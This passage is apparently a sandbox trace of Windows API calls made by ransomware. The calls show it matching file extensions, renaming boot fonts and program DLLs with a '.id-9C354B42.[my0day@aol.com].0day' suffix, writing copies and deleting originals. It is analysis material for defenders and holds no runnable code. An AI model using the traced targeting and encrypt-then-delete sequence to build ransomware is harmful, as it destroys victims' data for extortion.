(lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.470] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.470] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.470] lstrlenW (lpString=".doc") returned 4 [0265.470] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.470] lstrlenW (lpString=".docx") returned 5 [0265.470] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.470] lstrlenW (lpString=".pdf") returned 4 [0265.470] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.470] lstrlenW (lpString=".xls") returned 4 [0265.470] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.470] lstrlenW (lpString=".xlsx") returned 5 [0265.470] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.470] lstrlenW (lpString=".ppt") returned 4 [0265.470] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.470] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.470] lstrlenW (lpString=".zip") returned 4 [0265.470] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.470] lstrlenW (lpString=".rar") returned 4 [0265.470] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.470] lstrlenW (lpString=".bz2") returned 4 [0265.470] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.470] lstrlenW (lpString=".7z") returned 3 [0265.470] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.470] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.470] lstrlenW (lpString=".dbf") returned 4 [0265.470] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.471] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.471] lstrlenW (lpString=".1cd") returned 4 [0265.471] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.471] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.471] lstrlenW (lpString=".jpg") returned 4 [0265.471] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.471] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.471] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.471] lstrlenW (lpString=".doc") returned 4 [0265.471] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.471] lstrlenW (lpString=".docx") returned 5 [0265.471] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.471] lstrlenW (lpString=".pdf") returned 4 [0265.471] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.471] lstrlenW (lpString=".xls") returned 4 [0265.471] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.471] lstrlenW (lpString=".xlsx") returned 5 [0265.471] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.471] lstrlenW (lpString=".ppt") returned 4 [0265.471] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.471] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.471] lstrlenW (lpString=".zip") returned 4 [0265.471] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.471] lstrlenW (lpString=".rar") returned 4 [0265.471] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.471] lstrlenW (lpString=".bz2") returned 4 [0265.471] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.471] lstrlenW (lpString=".7z") returned 3 [0265.471] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.471] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.471] lstrlenW (lpString=".dbf") returned 4 [0265.472] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.472] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.472] lstrlenW (lpString=".1cd") returned 4 [0265.472] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.472] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0265.472] lstrlenW (lpString=".jpg") returned 4 [0265.472] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.472] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.472] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0265.472] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0265.472] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=87616) returned 1 [0265.472] CloseHandle (hObject=0x240) returned 1 [0265.472] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0265.472] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.472] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.472] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.472] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.472] lstrlenW (lpString=".doc") returned 4 [0265.473] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.473] lstrlenW (lpString=".docx") returned 5 [0265.473] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.473] lstrlenW (lpString=".pdf") returned 4 [0265.473] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.473] lstrlenW (lpString=".xls") returned 4 [0265.473] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.473] lstrlenW (lpString=".xlsx") returned 5 [0265.473] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.473] lstrlenW (lpString=".ppt") returned 4 [0265.473] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.473] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.473] lstrlenW (lpString=".zip") returned 4 [0265.473] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.473] lstrlenW (lpString=".rar") returned 4 [0265.473] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.473] lstrlenW (lpString=".bz2") returned 4 [0265.473] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.473] lstrlenW (lpString=".7z") returned 3 [0265.473] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.473] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.473] lstrlenW (lpString=".dbf") returned 4 [0265.473] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.473] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.473] lstrlenW (lpString=".1cd") returned 4 [0265.473] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString=".jpg") returned 4 [0265.474] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString=".doc") returned 4 [0265.474] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.474] lstrlenW (lpString=".docx") returned 5 [0265.474] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.474] lstrlenW (lpString=".pdf") returned 4 [0265.474] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.474] lstrlenW (lpString=".xls") returned 4 [0265.474] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.474] lstrlenW (lpString=".xlsx") returned 5 [0265.474] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.474] lstrlenW (lpString=".ppt") returned 4 [0265.474] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString=".zip") returned 4 [0265.474] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.474] lstrlenW (lpString=".rar") returned 4 [0265.474] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.474] lstrlenW (lpString=".bz2") returned 4 [0265.474] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.474] lstrlenW (lpString=".7z") returned 3 [0265.474] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString=".dbf") returned 4 [0265.474] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString=".1cd") returned 4 [0265.474] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.474] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0265.474] lstrlenW (lpString=".jpg") returned 4 [0265.475] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.475] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.475] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0265.475] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0265.475] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=91712) returned 1 [0265.475] CloseHandle (hObject=0x240) returned 1 [0265.475] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0265.475] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.475] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.475] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.475] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.475] lstrlenW (lpString=".doc") returned 4 [0265.475] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.475] lstrlenW (lpString=".docx") returned 5 [0265.475] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.475] lstrlenW (lpString=".pdf") returned 4 [0265.475] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.475] lstrlenW (lpString=".xls") returned 4 [0265.475] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.475] lstrlenW (lpString=".xlsx") returned 5 [0265.475] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.475] lstrlenW (lpString=".ppt") returned 4 [0265.476] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.476] lstrlenW (lpString=".zip") returned 4 [0265.476] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.476] lstrlenW (lpString=".rar") returned 4 [0265.476] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.476] lstrlenW (lpString=".bz2") returned 4 [0265.476] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.476] lstrlenW (lpString=".7z") returned 3 [0265.476] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.476] lstrlenW (lpString=".dbf") returned 4 [0265.476] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.476] lstrlenW (lpString=".1cd") returned 4 [0265.476] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.476] lstrlenW (lpString=".jpg") returned 4 [0265.476] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.476] lstrlenW (lpString=".doc") returned 4 [0265.476] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.476] lstrlenW (lpString=".docx") returned 5 [0265.476] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.476] lstrlenW (lpString=".pdf") returned 4 [0265.476] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.476] lstrlenW (lpString=".xls") returned 4 [0265.476] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.476] lstrlenW (lpString=".xlsx") returned 5 [0265.476] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.476] lstrlenW (lpString=".ppt") returned 4 [0265.476] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.476] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.477] lstrlenW (lpString=".zip") returned 4 [0265.477] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.477] lstrlenW (lpString=".rar") returned 4 [0265.477] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.477] lstrlenW (lpString=".bz2") returned 4 [0265.477] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.477] lstrlenW (lpString=".7z") returned 3 [0265.477] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.477] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.477] lstrlenW (lpString=".dbf") returned 4 [0265.477] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.477] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.477] lstrlenW (lpString=".1cd") returned 4 [0265.477] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.477] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0265.477] lstrlenW (lpString=".jpg") returned 4 [0265.477] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.477] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.477] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0265.477] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0265.477] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=94800) returned 1 [0265.477] CloseHandle (hObject=0x240) returned 1 [0265.477] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0265.477] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.478] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.478] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0265.478] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0265.478] lstrlenW (lpString=".doc") returned 4 [0265.478] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.478] lstrlenW (lpString=".docx") returned 5 [0265.478] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0265.478] lstrlenW (lpString=".pdf") returned 4 [0265.478] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.478] lstrlenW (lpString=".xls") returned 4 [0265.478] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.478] lstrlenW (lpString=".xlsx") returned 5 [0265.478] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0265.478] lstrlenW (lpString=".ppt") returned 4 [0265.478] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.478] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0265.478] lstrlenW (lpString=".zip") returned 4 [0265.478] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.478] lstrlenW (lpString=".rar") returned 4 [0265.478] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.478] lstrlenW (lpString=".bz2") returned 4 [0265.478] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.478] lstrlenW (lpString=".7z") returned 3 [0265.478] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.480] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0265.481] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0265.482] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0265.482] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.294] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.329] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\omdbase.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.330] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\omdproject.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.330] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\pipeline.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.331] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\pipetran.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.399] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.400] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.401] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.401] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0268.409] GetLastError () returned 0x0 [0268.409] ReadFile (in: hFile=0x2f8, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0xa2b58, lpOverlapped=0x0) returned 1 [0268.582] WriteFile (in: hFile=0x318, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xa2b60, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xa2b60, lpOverlapped=0x0) returned 1 [0268.617] ReadFile (in: hFile=0x2f8, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.618] WriteFile (in: hFile=0x318, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0268.618] SetEndOfFile (hFile=0x318) returned 1 [0268.618] CloseHandle (hObject=0x318) returned 1 [0268.618] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.618] SetEndOfFile (hFile=0x2f8) returned 1 [0268.741] CloseHandle (hObject=0x2f8) returned 1 [0268.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0268.843] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll")) returned 1 [0268.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.844] lstrlenW (lpString=".doc") returned 4 [0268.844] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0268.844] lstrlenW (lpString=".docx") returned 5 [0268.844] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0268.844] lstrlenW (lpString=".pdf") returned 4 [0268.844] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0268.844] lstrlenW (lpString=".xls") returned 4 [0268.844] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0268.844] lstrlenW (lpString=".xlsx") returned 5 [0268.844] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0268.844] lstrlenW (lpString=".ppt") returned 4 [0268.844] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0268.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0268.844] lstrlenW (lpString=".zip") returned 4 [0268.844] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0268.844] lstrlenW (lpString=".rar") returned 4 [0268.844] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0268.844] lstrlenW (lpString=".bz2") returned 4 [0268.844] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0268.844] lstrlenW (lpString=".7z") returned 3 [0268.844] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0268.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS 